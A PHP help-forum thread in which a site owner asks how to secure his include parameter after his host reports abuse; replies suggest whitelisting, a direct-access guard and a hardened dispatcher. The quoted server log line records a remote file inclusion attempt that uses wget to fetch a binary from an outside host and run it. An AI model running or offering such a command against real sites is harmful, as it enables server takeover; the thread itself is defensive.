Security help needed for includes

J Reid
Forum Newbie
Posts: 10
Joined: Wed Mar 10, 2004 5:24 am

Post by J Reid »

Hi all,

I got an email from my hosting company saying that they had found someone using my site, and my handwritten code, to try and hack into their servers. I have only a basic understanding of what is being exploited and want some advice on how to prevent it.

Below is some of the server log that was emailed to me. Basically I need to secure my includes. Apparently this is not too difficult.

Code:

www.sharperstill.com 200.158.8.123 - - [28/Jun/2004:10:46:15 +1000] "GET /index.php?include=http://www.h4ckbr.org/php.gif?&cmd=cd%20/var/tmp;wget%20http://h4ckbr.org/bd/44464;chmod%20777%2044464;./44464 HTTP/1.1" 200 4197 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
Jon
feyd
Neighborhood Spidermoddy
Posts: 31559
Joined: Mon Mar 29, 2004 3:24 pm
Location: Bothell, Washington, USA

Post by feyd »

You could switch to a system that doesn't use the URL to pass the whole filename, or any part of the filename, for the include.
J Reid
Forum Newbie
Posts: 10
Joined: Wed Mar 10, 2004 5:24 am

Can you elaborate

Post by J Reid »

I'm not sure what my options are......
feyd
Neighborhood Spidermoddy
Posts: 31559
Joined: Mon Mar 29, 2004 3:24 pm
Location: Bothell, Washington, USA

Post by feyd »

well.. consider the "include" parameter you have as a mode identifier..

so
/index.php?include=members
could correspond to memberinfo.inc.php
and
/index.php?include=threads
could correspond to viewthreads.inc.php

you can achieve this with a switch statement:

Code:

<?php

$include = (!empty($_GET['include']) ? $_GET['include'] : '');
switch($include)
{
  case 'members':
  $include = 'inc/memberinfo.php';
  break;

  case 'threads':
  $include = 'inc/viewthreads.php';
  break;

  default:
  $include = 'inc/mainpage.php';
  break;
}

include $include;

?>
qads
DevNet Resident
Posts: 1199
Joined: Tue Apr 23, 2002 10:02 am
Location: Brisbane

Post by qads »

Put all the include files in one folder, then use a script to load all the file names into an array (or, if you don't have many files, just put the names in the array yourself). Then get the file name from the URL, check the array to see if it exists, and if so include it; otherwise include an error page.

OR

Get the file name from the URL and use the file_exists() function to see if the file exists; if it does, include it, else include an error page.
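Putting the two suggestions above together as one dispatcher for index.php (this is an added example, not code posted in the thread): the request value is only ever a lookup key into a fixed map, as in feyd's switch, and a second check confines whatever file is chosen to the include directory, because file_exists() on its own would happily confirm that ../../etc/passwd exists. It assumes PHP 7.1+, an inc/ directory next to index.php and the page names shown; disabling allow_url_fopen (and, from PHP 5.2, allow_url_include) in php.ini also stops remote inclusion, but the code should not rely on that.

```php
<?php
// Hardened dispatcher for index.php?include=... (added example, not the
// thread's own code). The request value is only ever a lookup key; the
// file path comes from this map, so "include=http://..." or "../"
// never reaches include(). The page names and files are assumed.
const INCLUDE_DIR = __DIR__ . '/inc';
const PAGES = [
    'members' => 'memberinfo.php',
    'threads' => 'viewthreads.php',
    'contact' => 'contact.php',
];
const DEFAULT_PAGE = 'mainpage.php';

// Map the request key to an absolute path inside INCLUDE_DIR.
function resolveInclude(?string $key): string
{
    $file = PAGES[$key ?? ''] ?? DEFAULT_PAGE;
    return confineToDir(INCLUDE_DIR, $file);
}

// Second layer, for the file_exists() approach suggested above: a file
// existing is not the same as it being allowed. realpath() resolves
// ".." and symlinks, and the prefix test keeps the result under $dir.
// Returns the canonical path or throws if it escapes.
function confineToDir(string $dir, string $file): string
{
    $base = realpath($dir);
    $path = realpath($dir . DIRECTORY_SEPARATOR . $file);
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        throw new RuntimeException("refusing include outside $dir: $file");
    }
    return $path;
}

// Flag request values that look like the attempt in the first post, so
// blocked probes still show up in your own error log.
function looksLikeInclusionProbe(string $value): bool
{
    return (bool) preg_match('~^[a-z]+://|\.\./|\x00~i', $value);
}

$key = $_GET['include'] ?? null;
if ($key !== null && looksLikeInclusionProbe($key)) {
    error_log('blocked include probe from ' . ($_SERVER['REMOTE_ADDR'] ?? '?') . ': ' . $key);
}
define('IN_SITE', true);   // lets inner pages refuse direct access
include resolveInclude($key);
```

With this in place a request like the one in the log above simply gets the default page, and the probe line in the error log is what tells you it happened.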
J Reid
Forum Newbie
Posts: 10
Joined: Wed Mar 10, 2004 5:24 am

OK

Post by J Reid »

I can kind of follow that, except I'm not sure how that doesn't use the URL to send the mode identifier.....
feyd
Neighborhood Spidermoddy
Posts: 31559
Joined: Mon Mar 29, 2004 3:24 pm
Location: Bothell, Washington, USA

Post by feyd »

It does use the URL, but doesn't require it. But it doesn't directly use the URL in the filename to use. This separation, and the use of a default value, are the major security things this snippet does.
John Cartwright
Site Admin
Posts: 11470
Joined: Tue Dec 23, 2003 2:10 am
Location: Toronto

Post by John Cartwright »

If your main index page has calls to subpages within itself, you could do this:

index.php

Code:

<?php

define("IN_SITE",true);

?>
then on each of your inner pages (e.g. members.php):

Code:

<?php

// Refuse to run unless index.php has defined the marker constant first
if (!defined("IN_SITE"))
{
exit("You cannot access the page directly");
}

?>
J Reid
Forum Newbie
Posts: 10
Joined: Wed Mar 10, 2004 5:24 am

Post by J Reid »

My main index page looks for an inclusion, and if it doesn't find one it includes a default making my true index page. If it does find one then it loads that one making a page for contacting me via email. So there are only two includes. The only other page on my site - photo.php - uses the url to pass along variables for extracting the next image from the db etc...

Jon